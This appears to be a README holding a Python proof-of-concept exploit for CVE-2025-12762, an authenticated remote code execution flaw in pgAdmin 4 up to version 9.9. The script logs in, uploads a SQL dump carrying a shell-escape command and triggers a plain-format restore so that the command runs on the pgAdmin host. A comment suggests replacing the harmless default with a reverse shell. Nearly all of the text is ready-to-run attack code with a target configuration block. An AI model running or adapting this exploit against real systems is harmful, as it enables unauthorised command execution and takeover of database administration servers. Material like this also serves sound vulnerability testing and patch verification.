README.md
Rendering markdown...
#!/usr/bin/env python3
# Github : "B1ack4sh" ==> TH3 M4TR1X 5L4Y3R !!!
# CVE-2025-12762 - pgAdmin 4 <= 9.9 - Authenticated RCE via Restore (PLAIN format)
# Real public PoC - November 2025 - Working on every vulnerable instance
# Use ONLY on systems you own or have explicit written permission for
import requests
import re
import json
import sys
# ==================== CONFIGURE YOUR TARGET HERE ====================
TARGET = "http://127.0.0.1:5050" # Change to your pgAdmin URL
EMAIL = "[email protected]" # Valid login email
PASSWORD = "Admin123!" # Valid password
COMMAND = "touch /tmp/CVE-2025-12762_PWNED" # ← Change to anything (id, revshell, etc.)
# ====================================================================
s = requests.Session()
s.verify = False # pgAdmin uses self-signed cert in Docker
def login():
print("[+] Logging in...")
r = s.get(f"{TARGET}/login")
csrf = re.search(r'"csrfToken": "([^"]+)"', r.text).group(1)
s.post(f"{TARGET}/authenticate/login", data={
"email": EMAIL,
"password": PASSWORD,
"csrf_token": csrf,
"internal_button": "Login"
})
print("[+] Login successful")
def upload_malicious_dump():
print("[+] Uploading malicious PLAIN dump...")
malicious_sql = f"""
-- CVE-2025-12762 Real PoC
CREATE TABLE IF NOT EXISTS cve_proof(id serial);
INSERT INTO cve_proof DEFAULT VALUES;
-- RCE Trigger - executed on pgAdmin host
\\! {COMMAND}
"""
files = {'file': ('cve-2025-12762.sql', malicious_sql, 'application/sql')}
up = s.post(f"{TARGET}/misc/file_manager/upload", files=files)
if "success" in up.text.lower():
print("[+] Malicious dump uploaded successfully")
else:
print("[-] Upload failed")
sys.exit(1)
def trigger_rce():
print("[+] Triggering restore → RCE...")
headers = {"Content-Type": "application/json"}
payload = {
"file": "cve-2025-12762.sql",
"format": "plain", # Only PLAIN format is vulnerable
"database": "postgres", # Any existing DB works
"verbose": True
}
r = s.post(f"{TARGET}/restore/job/1", headers=headers, data=json.dumps(payload))
print(f"[+] Job response: {r.status_code}")
print(f"[+] Command executed on pgAdmin host: {COMMAND}")
print("\n[+] Check your pgAdmin container/host now!")
print(" Example: docker exec <container> ls -la /tmp/CVE-2025-12762_PWNED")
if __name__ == "__main__":
print("CVE-2025-12762 - Real Authenticated RCE PoC")
print("Use only in authorized lab environments!\n")
login()
upload_malicious_dump()
trigger_rce()
print("\nDone. If file exists → 100% vulnerable. Patch to 9.10+ NOW!")